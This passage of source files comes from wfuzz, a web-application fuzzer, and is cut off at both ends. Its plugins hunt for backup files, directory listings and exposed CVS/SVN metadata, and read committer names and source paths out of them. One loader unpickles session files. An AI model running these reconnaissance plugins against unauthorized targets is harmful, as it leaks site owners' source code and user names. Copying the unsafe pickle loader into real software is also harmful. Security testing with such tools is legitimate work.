        return FuzzWordType.WORD

    def get_next(self):
        """Return ``scheme://host:port`` for the next search match."""
        match = next(self._it)

        port = match["port"]
        if "ssl" in match or port == 443:
            scheme = "https"
        else:
            scheme = "http"

        hostnames = match["hostnames"]
        if hostnames:
            # NOTE(review): only the first hostname of a match is used; any
            # further hostnames are dropped. Confirm this is intended.
            for hostname in hostnames:
                return "{}://{}:{}".format(scheme, hostname, port)
        else:
            return "{}://{}:{}".format(scheme, match["ip_str"], port)

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/stdin.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePayload
from wfuzz.fuzzobjects import FuzzWordType

import sys


@moduleman_plugin
class stdin(BasePayload):
    """Payload that returns the lines read from standard input."""

    name = "stdin"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    description = ()
    summary = "Returns each item read from stdin."
# (continues the class body begun on the previous listing line)
    category = ["default"]
    priority = 99

    parameters = ()

    default_parameter = ""

    def __init__(self, params):
        BasePayload.__init__(self, params)
        self.__count = -1

    def count(self):
        """Return -1; the amount of input is not known in advance."""
        return self.__count

    def get_type(self):
        return FuzzWordType.WORD

    def get_next(self):
        """Return the next stdin line stripped of surrounding whitespace."""
        return next(sys.stdin).strip()

--------------------------------------------------------------------------------
/src/wfuzz/plugins/payloads/wfuzzp.py:
--------------------------------------------------------------------------------
import pickle as pickle
import gzip

from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.exception import FuzzExceptBadFile
from wfuzz.fuzzobjects import FuzzResult, FuzzWordType
from wfuzz.plugin_api.base import BasePayload
from wfuzz.helpers.obj_dyn import rgetattr


@moduleman_plugin
class wfuzzp(BasePayload):
    """Payload that replays FuzzResult objects from a stored wfuzz session.

    The session file is a gzip stream of pickled objects, so it must come
    from a trusted source (see ``_gen_wfuzz``).
    """

    name = "wfuzzp"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.2"
    description = (
        "This payload uses pickle.",
        "Warning: The pickle module is not intended to be secure against erroneous or maliciously constructed data.",
        "Never unpickle data received from an untrusted or unauthenticated source.",
        "See: https://blog.nelhage.com/2011/03/exploiting-pickle/",
    )
    summary = "Returns fuzz results' URL from a previous stored wfuzz session."
    category = ["default"]
    priority = 99

    parameters = (
        ("fn", "", True, "Filename of a valid wfuzz result file."),
        (
            "attr",
            None,
            False,
            "Attribute of fuzzresult to return. If not specified the whole object is returned.",
        ),
    )

    default_parameter = "fn"

    def __init__(self, params):
        """Store the requested attribute and create the lazy session reader."""
        BasePayload.__init__(self, params)

        self.__max = -1
        self.attr = self.params["attr"]
        self._it = self._gen_wfuzz(self.params["fn"])

    def count(self):
        """Return -1; the number of stored results is not computed up front."""
        return self.__max

    def get_next(self):
        """Return the next result, or its ``attr`` attribute when one was given."""
        stored = next(self._it)

        if self.attr:
            return rgetattr(stored, self.attr)
        return stored

    def get_type(self):
        if self.attr:
            return FuzzWordType.WORD
        return FuzzWordType.FUZZRES

    def _gen_wfuzz(self, output_fn):
        """Yield each pickled FuzzResult until the end of the gzip stream.

        Raises:
            FuzzExceptBadFile: the file cannot be opened, or an unpickled
                object is not a FuzzResult.
        """
        try:
            with gzip.open(self.find_file(output_fn), "r+b") as output:
                while True:
                    # SECURITY: pickle.load() can run code chosen by whoever
                    # wrote the file. The isinstance check below only runs
                    # after the object has been built, so it does not make an
                    # untrusted session file safe to load.
                    item = pickle.load(output)
                    if not isinstance(item, FuzzResult):
                        raise FuzzExceptBadFile(
                            "Wrong wfuzz payload format, the object read is not a valid fuzz result."
                        )

                    yield item
        except IOError as e:
            raise FuzzExceptBadFile("Error opening wfuzz payload file. %s" % str(e))
        except EOFError:
            # End of the pickle stream: finish the generator normally.
            return

--------------------------------------------------------------------------------
/src/wfuzz/plugins/printers/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/printers/__init__.py

--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/plugins/scripts/__init__.py

--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/backups.py:
--------------------------------------------------------------------------------
from wfuzz.externals.moduleman.plugin import moduleman_plugin
from wfuzz.plugin_api.base import BasePlugin

# Python 2 and 3
try:
    from urllib.parse import urljoin
except ImportError:
    from urlparse import urljoin


@moduleman_plugin
class backups(BasePlugin):
    """Script plugin that queues requests for backup copies of a found file."""

    name = "backups"
    summary = "Looks for known backup filenames."
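# (continues the class body begun on the previous listing line)
    # The tuple used to be closed after its first element, which turned the
    # remaining help lines into bare expression statements that were dropped.
    description = (
        "Looks for known backup filenames.",
        "For example, given http://localhost.com/dir/index.html, it will perform the following requests",
        "* http://localhost/dir/index.EXTENSIONS",
        "* http://localhost/dir/index.html.EXTENSIONS",
        "* http://localhost/dir.EXTENSIONS",
    )
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    category = ["fuzzer", "active"]
    priority = 99

    parameters = (
        (
            "ext",
            ".bak,.tgz,.zip,.tar.gz,~,.rar,.old,.-.swp",
            False,
            "Extensions to look for.",
        ),
    )

    def __init__(self):
        """Read the comma-separated extension list from the knowledge base."""
        BasePlugin.__init__(self)
        self.extensions = self.kbase["backups.ext"][0].split(",")

    def validate(self, fuzzresult):
        """Accept non-404 results whose extension is not itself a backup one."""
        return fuzzresult.code != 404 and (
            fuzzresult.history.urlparse.fext not in self.extensions
        )

    def process(self, fuzzresult):
        """Queue two candidate backup URLs per configured extension."""
        # >>> urlparse.urlparse("http://www.localhost.com/kk/index.html?id=1")
        # ParseResult(scheme='http', netloc='www.localhost.com', path='/kk/index.html', params='', query='id=1', fragment='')

        for pre_extension in self.extensions:
            # An entry of the form "PRE-EXT" contributes a prefix and a suffix.
            # NOTE(review): for entries without "-" (for example ".bak") the
            # whole entry lands in `pre` and `extension` is empty, which does
            # not match the examples in the comments below. Confirm.
            pre, nothing, extension = pre_extension.partition("-")

            # http://localhost/dir/test.html -----> test.BAKKK
            self.queue_url(
                urljoin(
                    fuzzresult.url, pre + fuzzresult.history.urlparse.fname + extension
                )
            )

            # http://localhost/dir/test.html ---> test.html.BAKKK
            self.queue_url(
                urljoin(fuzzresult.url, fuzzresult.history.urlparse.ffname + extension)
            )

            # http://localhost/dir/test.html ----> dir.BAKKK
            # (listed in the description, but no request is queued for it here)

--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/cookies.py:
--------------------------------------------------------------------------------
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.externals.moduleman.plugin import moduleman_plugin


# Knowledge-base key under which cookie names already reported are stored.
KBASE_NEW_COOKIE = "cookies.cookie"

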
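@moduleman_plugin
class cookies(BasePlugin):
    """Passive plugin that reports a cookie the first time a response sets it."""

    name = "cookies"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Looks for new cookies"
    description = ("Looks for new cookies",)
    category = ["info", "passive", "default"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        """Every result is inspected; the plugin sends no requests of its own."""
        return True

    def process(self, fuzzresult):
        """Record each response cookie whose name has not been seen before.

        The cookie value is written to the result verbatim, so session
        identifiers issued by the target end up in the scan output; handle
        saved results accordingly.
        """
        for name, value in fuzzresult.history.cookies.response.items():
            if not name:
                # The original test read "(name != '' and A) or B" because
                # ``and`` binds tighter than ``or``, so an empty name still
                # reached the knowledge-base lookup.
                continue

            # presumably assigning to self.kbase[key] appends to a list of
            # seen names - TODO confirm against the kbase implementation
            if (
                KBASE_NEW_COOKIE not in self.kbase
                or name not in self.kbase[KBASE_NEW_COOKIE]
            ):
                self.kbase[KBASE_NEW_COOKIE] = name
                self.add_result(
                    "cookie", "Cookie first set", "%s=%s" % (name, value)
                )
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/cvs_extractor.py:
--------------------------------------------------------------------------------
# Python 2 and 3
try:
    from urllib.parse import urljoin
except ImportError:
    from urlparse import urljoin

from wfuzz.plugin_api.urlutils import check_content_type

from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.externals.moduleman.plugin import moduleman_plugin

# Entries format based on:
# http://docstore.mik.ua/orelly/other/cvs/cvs-CHP-6-SECT-9.htm
# Good example at http://webscantest.com/CVS/Entries


@moduleman_plugin
class cvs_extractor(BasePlugin, DiscoveryPluginMixin):
    name = "cvs_extractor"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Parses CVS/Entries file."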
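    description = ("Parses CVS/Entries file and enqueues found entries",)
    category = ["active", "discovery"]
    priority = 99
    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        """Accept successful text responses whose URL contains "CVS/Entries"."""
        return (
            fuzzresult.url.find("CVS/Entries") >= 0
            and fuzzresult.code == 200
            and check_content_type(fuzzresult, "text")
        )

    def process(self, fuzzresult):
        """Queue every name listed in the Entries file, relative to its parent.

        Records are split on "/", so a queued name can never contain a path
        separator of its own.
        """
        base_url = urljoin(fuzzresult.url, "..")

        for line in fuzzresult.history.content.splitlines():
            record = line.split("/")
            if len(record) != 6 or not record[1]:
                continue

            self.queue_url(urljoin(base_url, record[1]))

            # Directory: also descend into its own CVS/Entries file.
            if record[0] == "D":
                self.queue_url(urljoin(base_url, record[1]))
                self.queue_url(urljoin(base_url, "%s/CVS/Entries" % (record[1])))
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/grep.py:
--------------------------------------------------------------------------------
import re

from wfuzz.plugin_api.base import BasePlugin
from wfuzz.exception import FuzzExceptPluginBadParams
from wfuzz.externals.moduleman.plugin import moduleman_plugin


@moduleman_plugin
class grep(BasePlugin):
    """Reports every match of a user-supplied regex in the response body."""

    name = "grep"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "HTTP response grep"
    description = (
        "Extracts the given regex pattern from the HTTP response and prints it",
        "(It is not a filter operator)",
    )
    category = ["tools"]
    priority = 99

    parameters = (("regex", "", True, "Regex to perform the grep against."),)

    def __init__(self):
        """Compile the ``regex`` parameter.

        Raises:
            FuzzExceptPluginBadParams: the parameter is missing or does not
                compile.
        """
        BasePlugin.__init__(self)
        try:
            # The leftover debug print of the raw parameter was dropped; it
            # wrote to stdout on every plugin instantiation.
            self.regex = re.compile(
                self.kbase["grep.regex"][0], re.MULTILINE | re.DOTALL
            )
        except Exception:
            raise FuzzExceptPluginBadParams(
                "Incorrect regex or missing regex parameter."
            )

    def validate(self, fuzzresult):
        return True

    def process(self, fuzzresult):
        """Add one "match" result per regex hit in the response content."""
        for r in self.regex.findall(fuzzresult.history.content):
            self.add_result("match", "Pattern match", r)
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/listing.py:
--------------------------------------------------------------------------------
import re

from wfuzz.plugin_api.base import BasePlugin
from wfuzz.externals.moduleman.plugin import moduleman_plugin


@moduleman_plugin
class listing(BasePlugin):
    """Passive check for web-server generated directory index pages."""

    name = "listing"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Looks for directory listing vulnerabilities"
    description = ("Looks for directory listing vulnerabilities",)
    category = ["default", "passive"]
    priority = 99

    parameters = ()

    def __init__(self):
        """Compile the signatures of common directory-index pages."""
        BasePlugin.__init__(self)

        # The "<TITLE>Folder Listing." signature was listed twice; one copy
        # matches exactly the same responses.
        dir_indexing_regexes = [
            "Index of /",
            '<a href="\\?C=N;O=D">Name</a>',
            "Last modified</a>",
            "Parent Directory</a>",
            "Directory Listing for",
            "<TITLE>Folder Listing.",
            '<table summary="Directory Listing" ',
            "- Browsing directory ",
            '">\\[To Parent Directory\\]</a><br><br>',  # IIS 6.0 and 7.0
            '<A HREF=".*?">.*?</A><br></pre><hr></body></html>',  # IIS 5.0
        ]

        self.regex = [
            re.compile(pattern, re.MULTILINE | re.DOTALL)
            for pattern in dir_indexing_regexes
        ]

    def validate(self, fuzzresult):
        return fuzzresult.code in [200]

    def process(self, fuzzresult):
        """Report once if any signature occurs in the response content."""
        content = fuzzresult.history.content
        # search() stops at the first hit; findall() built the full match list
        # only to test whether it was empty.
        if any(r.search(content) for r in self.regex):
            self.add_result("msg", "Directory listing identified", None)
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/npm_deps.py:
--------------------------------------------------------------------------------
import re

from wfuzz.plugin_api.base import BasePlugin
from wfuzz.exception import FuzzExceptPluginBadParams
from wfuzz.externals.moduleman.plugin import moduleman_plugin


@moduleman_plugin
class npm_deps(BasePlugin):
    """Extracts npm package names from dependency maps left in served .js files."""

    name = "npm_deps"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Looks for npm dependencies definition in js code"
    description = (
        "Extracts npm packages by using regex pattern from the HTTP response and prints it",
    )
    category = ["info"]
    priority = 99

    parameters = ()

    REGEX_PATT = re.compile(r'"([^"]+)":"([^"]+)"', re.MULTILINE | re.DOTALL)
    # NOTE(review): with IGNORECASE this pattern also matches the tail of
    # "devDependencies:{", so ``match`` can land on the dev block when that
    # block comes first in the file.
    REGEX_DEP = re.compile(
        r"dependencies:\{(.*?)\}", re.MULTILINE | re.DOTALL | re.IGNORECASE
    )
    REGEX_DEV_DEP = re.compile(
        r"devdependencies:\{(.*?)\}", re.MULTILINE | re.DOTALL | re.IGNORECASE
    )

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        """Accept 200 responses for .js files that contain a dependency map.

        The two match objects are kept on ``self`` for ``process`` to read.
        """
        if fuzzresult.history.urlparse.fext != ".js" or fuzzresult.code != 200:
            return False

        self.match = self.REGEX_DEP.search(fuzzresult.history.content)
        self.match_dev = self.REGEX_DEV_DEP.search(fuzzresult.history.content)

        return self.match is not None or self.match_dev is not None

    def process(self, fuzzresult):
        """Report each package name found by ``validate``.

        The result labels were swapped: names from the devDependencies map
        were reported as "dependency" and the regular ones as
        "dev_dependency".
        """
        if self.match_dev:
            for name, _ in self.REGEX_PATT.findall(self.match_dev.group(1)):
                self.add_result("dev_dependency", "npm dev dependency", name)

        if self.match:
            for name, _ in self.REGEX_PATT.findall(self.match.group(1)):
                self.add_result("dependency", "npm dependency", name)
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/robots.py:
--------------------------------------------------------------------------------
import sys

# Python 2 and 3
if sys.version_info >= (3, 0):
    from urllib.parse import urljoin
else:
    from urlparse import urljoin

from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.plugin_api.urlutils import check_content_type
from wfuzz.externals.moduleman.plugin import moduleman_plugin


@moduleman_plugin
class robots(BasePlugin, DiscoveryPluginMixin):
    """Discovery plugin that queues the paths listed in robots.txt."""

    name = "robots"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Parses robots.txt looking for new content."
    description = ("Parses robots.txt looking for new content.",)
    category = ["active", "discovery"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        """Accept a successful text response for a file named robots.txt."""
        return (
            fuzzresult.history.urlparse.ffname == "robots.txt"
            and fuzzresult.code == 200
            and check_content_type(fuzzresult, "text")
        )

    def process(self, fuzzresult):
        """Queue and report the target of every Allow/Disallow/Sitemap line.

        The values are server-controlled and Sitemap entries are normally
        absolute URLs, so urljoin() can yield links on another host.
        Whether queue_url() enforces the scan scope is not visible here -
        TODO confirm.
        """
        # Shamelessly (partially) copied from w3af's plugins/discovery/robotsReader.py
        directives = ("ALLOW", "DISALLOW", "SITEMAP")

        for line in fuzzresult.history.content.split("\n"):
            line = line.strip()

            if not line or line[0] == "#":
                continue
            if not line.upper().startswith(directives):
                continue

            _, colon, value = line.partition(":")
            if not colon:
                # Without a colon the old slice (find() == -1) fell back to
                # the whole line and queued the directive word itself.
                continue

            url = value.strip(" *")

            if url:
                new_link = urljoin(fuzzresult.url, url)
                self.queue_url(new_link)
                self.add_result("link", "New link found", new_link)
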
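--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/screenshot.py:
--------------------------------------------------------------------------------
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.externals.moduleman.plugin import moduleman_plugin

import subprocess
import tempfile
import pipes  # unused below; the module was removed from the standard library in Python 3.13
import os
import re


@moduleman_plugin
class screenshot(BasePlugin):
    """Captures an image of each result URL with the external cutycapt tool."""

    name = "screenshot"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Performs a screen capture using linux cutycapt tool"
    description = (
        "Performs a screen capture using linux cutycapt tool",
        "The tool must be installed and in the executable path",
    )
    category = ["tools", "active"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        return fuzzresult.code not in [404]

    def process(self, fuzzresult):
        """Run cutycapt on ``fuzzresult.url`` and report the output file.

        cutycapt loads and renders the target page itself, with certificate
        checks disabled by ``--insecure``, so this plugin makes an extra
        request per result and exposes the scanning host to that content.

        Raises:
            OSError: cutycapt could not be started (for example, not
                installed).
        """
        # Only a sanitised, length-limited form of the URL reaches the file
        # name, so URL characters cannot steer the output path.
        slug = re.sub(r"[^a-zA-Z0-9_-]", "_", fuzzresult.url)[:200]

        # mkstemp() creates the file atomically and privately. The private
        # tempfile helpers used before only produced a name, which another
        # local user could pre-create or symlink in a shared temp directory.
        fd, filename = tempfile.mkstemp(prefix=slug + "_", suffix=".jpg")
        os.close(fd)

        try:
            # The argument list is handed to the program without a shell, so
            # the URL needs no quoting; shell-quoting it here passed literal
            # quote characters to cutycapt for any URL containing "?" or "&".
            subprocess.call(
                [
                    "cutycapt",
                    "--url=%s" % fuzzresult.url,
                    "--out=%s" % filename,
                    "--insecure",
                    "--print-backgrounds=on",
                ]
            )
        except OSError:
            # Do not leave the empty placeholder behind when the tool is missing.
            os.remove(filename)
            raise

        self.add_result("file", "Screnshot taken", filename)
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/sitemap.py:
--------------------------------------------------------------------------------
from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.exception import FuzzExceptResourceParseError
from wfuzz.externals.moduleman.plugin import moduleman_plugin

import xml.dom.minidom


@moduleman_plugin
class sitemap(BasePlugin, DiscoveryPluginMixin):
    """Discovery plugin that queues every <loc> URL of a sitemap.xml."""

    name = "sitemap"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Parses sitemap.xml file"
    description = ("Parses sitemap.xml file",)
    category = ["active", "discovery"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        return (
            fuzzresult.history.urlparse.ffname == "sitemap.xml"
            and fuzzresult.code == 200
        )

    def process(self, fuzzresult):
        """Parse the response as XML and queue the text of each <loc> element.

        Raises:
            FuzzExceptResourceParseError: the body is not well-formed XML.
        """
        # SECURITY: the document is supplied by the scanned server. The Python
        # documentation lists xml.dom.minidom as vulnerable to entity-expansion
        # attacks ("billion laughs", quadratic blowup), so a hostile sitemap
        # can exhaust memory or CPU on the scanning host. A hardened parser
        # such as defusedxml would close this; it is not a dependency visible
        # in this file.
        try:
            dom = xml.dom.minidom.parseString(fuzzresult.history.content)
        except Exception:
            raise FuzzExceptResourceParseError(
                "Error while parsing %s." % fuzzresult.url
            )

        for loc in dom.getElementsByTagName("loc"):
            if not loc.childNodes:
                # An empty <loc/> has no text node; indexing it raised IndexError.
                continue

            # <loc> values are absolute URLs chosen by the server; whether
            # queue_url() keeps them inside the scan scope is not visible
            # here - TODO confirm.
            self.queue_url(loc.childNodes[0].data)
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/svn_extractor.py:
--------------------------------------------------------------------------------
# Python 2 and 3
try:
    from urllib.parse import urljoin
except ImportError:
    from urlparse import urljoin

from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.externals.moduleman.plugin import moduleman_plugin


@moduleman_plugin
class svn_extractor(BasePlugin, DiscoveryPluginMixin):
    name = "svn_extractor"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Parses .svn/entries file."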
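    # The text was copied from the CVS plugin; this one reads .svn/entries.
    description = ("Parses .svn/entries file and enqueues found entries",)
    category = ["active", "discovery"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        return fuzzresult.url.find(".svn/entries") > 0 and fuzzresult.code == 200

    def readsvn(self, content):
        """Extract file names, directory names and authors from an entries file.

        Function shamelessly copied (and adapted) from https://github.com/anantshri/svn-extractor/
        Credit (C) Anant Shrivastava http://anantshri.info

        The value of interest is always the line that precedes a marker line
        ("file", "dir" or "has-props").

        Returns:
            A ``(file_list, dir_list, author_list)`` tuple of string lists.
        """
        old_line = ""
        file_list = []
        dir_list = []
        author_list = []

        for a in content.splitlines():
            # the line before "has-props" is collected as a user name
            if a == "has-props":
                if old_line not in author_list:
                    author_list.append(old_line)
            if a == "file":
                if old_line not in file_list:
                    file_list.append(old_line)
            if a == "dir":
                if old_line != "":
                    dir_list.append(old_line)
            old_line = a
        return file_list, dir_list, author_list

    def process(self, fuzzresult):
        """Report the committers and queue the listed files and sub-directories.

        Author names are disclosed by the exposed metadata and are written
        to the results as found.
        """
        base_url = fuzzresult.url

        file_list, dir_list, author_list = self.readsvn(fuzzresult.history.content)

        if author_list:
            self.add_result("authors", "SVN authors", ", ".join(author_list))

        # Entries are relative to the directory that holds .svn/.
        parent_url = base_url.replace("/.svn/", "/")

        for f in file_list:
            self.queue_url(urljoin(parent_url, f))

        for d in dir_list:
            self.queue_url(urljoin(parent_url, d) + "/.svn/entries")
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/title.py:
--------------------------------------------------------------------------------
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.externals.moduleman.plugin import moduleman_plugin


@moduleman_plugin
class title(BasePlugin):
    """Passive plugin that reports each distinct HTML page title once."""

    name = "title"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Parses HTML page title"
    description = ("Parses HTML page title",)
    category = ["info", "passive"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        return True

    def process(self, fuzzresult):
        """Add a "title" result when the page title has not been seen before."""
        soup = fuzzresult.history.get_soup()
        page_title = soup.title.string if soup.title else ""

        # ``and`` binds tighter than ``or``: the original test read
        # "(title != '' and A) or B", so an empty title still reached the
        # knowledge-base lookup. A title without a plain string is skipped
        # as well.
        if page_title and (
            "title" not in self.kbase or page_title not in self.kbase["title"]
        ):
            self.kbase["title"] = page_title
            self.add_result("title", "Page title", page_title)
--------------------------------------------------------------------------------
/src/wfuzz/plugins/scripts/wcdb.py:
--------------------------------------------------------------------------------
# Python 2 and 3
try:
    from urllib.parse import urljoin
except ImportError:
    from urlparse import urljoin

from wfuzz.plugin_api.mixins import DiscoveryPluginMixin
from wfuzz.plugin_api.base import BasePlugin
from wfuzz.exception import FuzzExceptResourceParseError
from wfuzz.externals.moduleman.plugin import moduleman_plugin

import tempfile
import sqlite3


@moduleman_plugin
class wcdb_extractor(BasePlugin, DiscoveryPluginMixin):
    name = "wc_extractor"
    author = ("Xavi Mendez (@xmendez)",)
    version = "0.1"
    summary = "Parses subversion's wc.db file."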
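    description = ("Parses subversion's wc.db file.",)
    category = ["active", "discovery"]
    priority = 99

    parameters = ()

    def __init__(self):
        BasePlugin.__init__(self)

    def validate(self, fuzzresult):
        return fuzzresult.url.find(".svn/wc.d") > 0 and fuzzresult.code == 200

    def readwc(self, content):
        """Read committers and tracked files out of a downloaded wc.db.

        Function shamelessly copied (and adapted) from https://github.com/anantshri/svn-extractor/
        Credit (C) Anant Shrivastava http://anantshri.info

        ``content`` is the response body of the scanned server, so SQLite is
        opening an untrusted database file here. It is written to a private
        temporary file that is removed again before returning.

        Returns:
            ``(author_list, list_items)``: the distinct author names and the
            ``(local_relpath, pristine_path)`` rows of file nodes.

        Raises:
            FuzzExceptResourceParseError: the queries failed.
        """
        import os  # local import: this module's header does not import os

        author_list = []
        list_items = None
        (fd, filename) = tempfile.mkstemp()
        conn = None

        try:
            # Reuse the descriptor mkstemp() returned; reopening the file by
            # name left that descriptor open for the rest of the process.
            with os.fdopen(fd, "wb") as f:
                f.write(content)

            conn = sqlite3.connect(filename)
            c = conn.cursor()
            try:
                c.execute(
                    'select local_relpath, ".svn/pristine/" || substr(checksum,7,2) || "/" || substr(checksum,7) || ".svn-base" as alpha from NODES where kind="file";'
                )
                list_items = c.fetchall()
                # collect every user name that has committed at least once;
                # NULL authors are dropped because process() joins the names
                c.execute("select distinct changed_author from nodes;")
                author_list = [r[0] for r in c.fetchall() if r[0]]
                c.close()
            except Exception:
                raise FuzzExceptResourceParseError(
                    "Error reading wc.db, either database corrupt or invalid file"
                )
        finally:
            # One temp file was leaked per matching response, together with
            # an open connection.
            if conn is not None:
                conn.close()
            os.remove(filename)

        return author_list, list_items

    def process(self, fuzzresult):
        """Report the committers and queue every file tracked in wc.db."""
        author_list, list_items = self.readwc(fuzzresult.history.content)

        if author_list:
            self.add_result("authors", "SVN authors", ", ".join(author_list))

        if list_items:
            for f, pristine in list_items:
                # local_relpath comes from the downloaded database and is
                # joined onto the working-copy root.
                u = urljoin(fuzzresult.url.replace("/.svn/wc.db", "/"), f)
                if self.queue_url(u):
                    self.add_result("source", "SVN source code", f)
--------------------------------------------------------------------------------
/src/wfuzz/ui/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/ui/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/ui/console/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/ui/console/__init__.py
--------------------------------------------------------------------------------
/src/wfuzz/ui/console/getch.py:
--------------------------------------------------------------------------------
# http://code.activestate.com/recipes/134892/
#
# getch()-like unbuffered character reading from stdin on both Windows and Unix (Python recipe)
# A small utility class to read single characters from standard input, on both Windows and UNIX systems. It provides a getch() function-like instance.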
5 | # 6 | # Created by Danny Yoo on Fri, 21 Jun 2002 (PSF) 7 | # (http://code.activestate.com/recipes/users/98032/) 8 | 9 | 10 | class _Getch: 11 | """Gets a single character from standard input. Does not echo to the screen.""" 12 | 13 | def __init__(self): 14 | try: 15 | self.impl = _GetchWindows() 16 | except ImportError: 17 | try: 18 | self.impl = _GetchUnix() 19 | except ImportError: 20 | self.impl = _GetchMacCarbon() 21 | 22 | def __call__(self): 23 | return self.impl() 24 | 25 | 26 | class _GetchUnix: 27 | def __init__(self): 28 | import tty 29 | import sys 30 | 31 | def __call__(self): 32 | import sys 33 | import tty 34 | import termios 35 | 36 | fd = sys.stdin.fileno() 37 | old_settings = termios.tcgetattr(fd) 38 | try: 39 | tty.setraw(sys.stdin.fileno()) 40 | ch = sys.stdin.read(1) 41 | finally: 42 | termios.tcsetattr(fd, termios.TCSADRAIN, old_settings) 43 | return ch 44 | 45 | 46 | class _GetchWindows: 47 | def __init__(self): 48 | import msvcrt 49 | 50 | def __call__(self): 51 | import msvcrt 52 | 53 | 54 | class _GetchMacCarbon: 55 | """ 56 | A function which returns the current ASCII key that is down; 57 | if no ASCII key is down, the null string is returned. The 58 | page http://www.mactech.com/macintosh-c/chap02-1.html was 59 | very helpful in figuring out how to do this. 
60 | """ 61 | 62 | def __init__(self): 63 | import Carbon 64 | 65 | # see if it has this (in Unix, it doesn't) 66 | Carbon.Evt 67 | 68 | def __call__(self): 69 | import Carbon 70 | 71 | if Carbon.Evt.EventAvail(0x0008)[0] == 0: # 0x0008 is the keyDownMask 72 | return "" 73 | else: 74 | # 75 | # The event contains the following info: 76 | # (what,msg,when,where,mod)=Carbon.Evt.GetNextEvent(0x0008)[1] 77 | # 78 | # The message (msg) contains the ASCII char which is 79 | # extracted with the 0x000000FF charCodeMask; this 80 | # number is converted to an ASCII character with chr() and 81 | # returned 82 | # 83 | (what, msg, when, where, mod) = Carbon.Evt.GetNextEvent(0x0008)[1] 84 | return chr(msg & 0x000000FF) 85 | 86 | 87 | if __name__ == "__main__": 88 | print("Press a key") 89 | inkey = _Getch() 90 | 91 | import sys 92 | 93 | for i in range(sys.maxsize): 94 | k = inkey() 95 | if k != "": 96 | break 97 | print("you pressed ", k) 98 | -------------------------------------------------------------------------------- /src/wfuzz/ui/gui/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xmendez/wfuzz/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/src/wfuzz/ui/gui/__init__.py -------------------------------------------------------------------------------- /src/wfuzz/ui/gui/controller.py: -------------------------------------------------------------------------------- 1 | import wx 2 | 3 | from .ui.console.clparser import CLParser 4 | from .ui.gui.model import GUIModel 5 | from .facade import Facade 6 | 7 | if "2.8" in wx.version(): 8 | import wx.lib.pubsub.setupkwargs 9 | from wx.lib.pubsub import pub 10 | else: 11 | from wx.lib.pubsub import pub 12 | 13 | 14 | class WfuzzInterpreter: 15 | def __init__(self, model): 16 | self.model = model 17 | 18 | def onecmd(self, cmd): 19 | if cmd[0] == "wfuzz": 20 | self.do_wfuzz(cmd) 21 | elif cmd[0] == "clear": 22 | self.model.Clear() 23 | elif cmd[0] == 
